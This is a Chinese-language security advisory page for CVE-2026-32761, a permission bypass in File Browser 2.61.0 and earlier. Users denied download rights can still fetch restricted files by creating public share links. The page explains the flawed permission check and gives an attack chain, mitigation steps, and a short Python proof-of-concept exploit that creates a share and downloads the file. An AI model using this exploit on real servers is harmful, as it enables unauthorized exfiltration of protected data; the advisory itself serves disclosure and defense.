IPBUF安全漏洞报告
English
CVE-2026-32761 CVSS 6.5 中危

CVE-2026-32761 File Browser权限绕过漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32761
漏洞类型
权限绕过
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
File Browser

相关标签

权限绕过信息泄露File BrowserCVE-2026-32761

漏洞概述

File Browser 2.61.0及以下版本存在权限绕过漏洞。即使被拒绝下载权限的用户,只要拥有分享权限,即可通过创建公开分享链接绕过下载限制。系统在处理公开下载请求时未验证文件创建者的下载权限,导致受限用户可非法获取文件内容。该漏洞破坏了数据防丢失策略,已在2.62.0版本修复。

技术细节

该漏洞的根本原因在于权限验证逻辑的不一致性。File Browser 的直接下载端点(/api/raw/)会正确检查用户的 perm.download 权限。然而,分享创建端点仅检查 perm.share 权限。当用户创建公开分享链接后,公开下载处理器(/api/public/dl/<hash>)仅根据哈希值提供服务,并未验证该链接的原始创建者是否具备对目标文件的下载权限。这使得受限用户可以通过生成分享链接,然后直接访问公开下载地址的方式,成功绕过 perm.download=false 的限制,实现敏感数据的非法外传。

攻击链分析

STEP 1
1. 获取低权限账户
攻击者获得一个具有分享权限(perm.share=true)但无下载权限(perm.download=false)的账户。
STEP 2
2. 创建分享链接
攻击者利用分享权限,针对受限文件调用API创建公开分享链接。
STEP 3
3. 访问公开下载接口
攻击者直接访问生成的公开下载链接(/api/public/dl/<hash>)。
STEP 4
4. 获取文件内容
后端验证哈希有效后直接返回文件内容,未检查原始创建者的下载权限,导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-32761 # Description: Exploit permission bypass by creating a share and downloading via public link. import requests target = "http://example.com:8080" api_token = "YOUR_SESSION_TOKEN" file_path = "restricted_file.txt" headers = {"X-Auth": api_token, "Content-Type": "application/json"} # Step 1: Create a public share using share permission share_url = f"{target}/api/resources/share" payload = {"path": file_path} response = requests.post(share_url, headers=headers, json=payload) if response.status_code == 200 and 'hash' in response.json(): share_hash = response.json()['hash'] print(f"[+] Share created: {share_hash}") # Step 2: Access the file via public download endpoint bypassing download permission check public_dl_url = f"{target}/api/public/dl/{share_hash}/{file_path}" file_response = requests.get(public_dl_url) if file_response.status_code == 200: print("[+] Exploit successful! File content downloaded:") print(file_response.text) else: print("[-] Failed to create share or exploit failed.")

影响范围

File Browser <= 2.61.0

防御指南

临时缓解措施
建议立即升级至2.62.0版本。如果暂时无法升级,管理员应撤销受限用户的分享权限(perm.share),以防止通过公开链接绕过下载限制。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表